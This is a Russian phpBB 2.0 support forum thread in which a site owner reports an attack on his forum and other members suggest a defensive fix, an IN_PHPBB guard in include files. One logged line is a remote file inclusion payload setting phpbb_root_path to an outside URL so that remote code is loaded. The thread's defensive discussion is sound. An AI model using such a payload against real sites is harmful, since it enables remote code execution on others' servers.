Уважаемые пользователи!
C 7 ноября 2020 года phpBB Group прекратила выпуск обновлений и завершила дальнейшее развитие phpBB версии 3.2.
С 1 августа 2024 года phpBB Group прекращает поддержку phpBB 3.2 на официальном сайте.
Сайт официальной русской поддержки phpBB Guru продолжит поддержку phpBB 3.2 до 31 декабря 2024 года.
С учетом этого, настоятельно рекомендуется обновить конференции до версии 3.3.

Взломали форум

Проблемы с установкой или работой phpBB 2.0.x? Ищите ответы здесь!
Gosudar
phpBB 2.0.0
Сообщения: 227
Стаж: 18 лет 9 месяцев

Сообщение Gosudar »

Да кстати, я попытки взлома пишу в лог файл
вот один пыталяся :
?phpbb_root_path=http://godsteam.org/echo3?
сволочь пасс хотел.
godsteam.org настучать что ли на них?
Аватара пользователя
Rayden
Former team member
Сообщения: 3739
Стаж: 18 лет 9 месяцев
Поблагодарили: 3 раза

Сообщение Rayden »

Я думаю, если есть возмоность/желание - обязательно надо. Такие вещи не должны безнаказанно проходить.
phpBB2 FAQ
phpBB3 FAQ
Gosudar
phpBB 2.0.0
Сообщения: 227
Стаж: 18 лет 9 месяцев

Сообщение Gosudar »

deleted
Последний раз редактировалось Gosudar 08.10.2007 11:49, всего редактировалось 1 раз.
Аватара пользователя
Rayden
Former team member
Сообщения: 3739
Стаж: 18 лет 9 месяцев
Поблагодарили: 3 раза

Сообщение Rayden »

Портянку убери, запрещено правилами.
phpBB2 FAQ
phpBB3 FAQ
Аватара пользователя
Siava
Поддержка
Поддержка
Сообщения: 5283
Стаж: 19 лет 3 месяца
Откуда: Питер
Благодарил (а): 186 раз
Поблагодарили: 793 раза

Сообщение Siava »

Rayden
Какая ж это портянка?
Еще одно нарушение правил и будете забанены. © Mr. Anderson
Ты очистил кеш? © Sheer
https://siava.ru (phpbb 2.0.x 3.5.x)
Аватара пользователя
Rayden
Former team member
Сообщения: 3739
Стаж: 18 лет 9 месяцев
Поблагодарили: 3 раза

Сообщение Rayden »

Больше 25 строк.
phpBB2 FAQ
phpBB3 FAQ
Xpert
phpBB Guru
phpBB Guru
Сообщения: 5484
Стаж: 20 лет 1 месяц
Поблагодарили: 2 раза

Сообщение Xpert »

Есть аналогичные дыры которые тут лечили, применительно к KB Mod, который тоже является частью портала.
Эксперт - это человек, который избегает мелких ошибок на пути к грандиозному провалу.
Любая более-менее сложная задача имеет несколько простых, изящных, лёгких для понимания неправильных решений
Jovani
phpBB 2.0.5
Сообщения: 477
Стаж: 19 лет 11 месяцев

Сообщение Jovani »

По идее, достаточно, сделать проверку как в других аналогичных файлах, то есть, в начале файла, после копирайтов, добавить:

Код: Выделить всё

if ( !defined('IN_PHPBB') )
{
	die("Hacking attempt");
}
Кстати, от греха подальше, аналогично сделать с другими файлами в этой директории pafiledb/includes ;)
Аватара пользователя
Neonaft
phpBB 1.4.4
Сообщения: 114
Стаж: 18 лет 2 месяца

Сообщение Neonaft »

А вот собственно вопрос, в каких файлах нужно писать подобный код?
Неужели прям во всех или есть предпочтения?
tematika
phpBB 1.2.0
Сообщения: 14
Стаж: 17 лет 4 месяца

Сообщение tematika »

А чем это опасно? На одном форуме вылазит Hacking attempt! На другом ничего.
Jovani
phpBB 2.0.5
Сообщения: 477
Стаж: 19 лет 11 месяцев

Сообщение Jovani »

Neonaft писал(а):А вот собственно вопрос, в каких файлах нужно писать подобный код?
Неужели прям во всех или есть предпочтения?
В тех, которые не должны исполняться отдельно от phpbb, то есть в "подключаемых".

Вернуться в «Поддержка phpBB 2.0.x»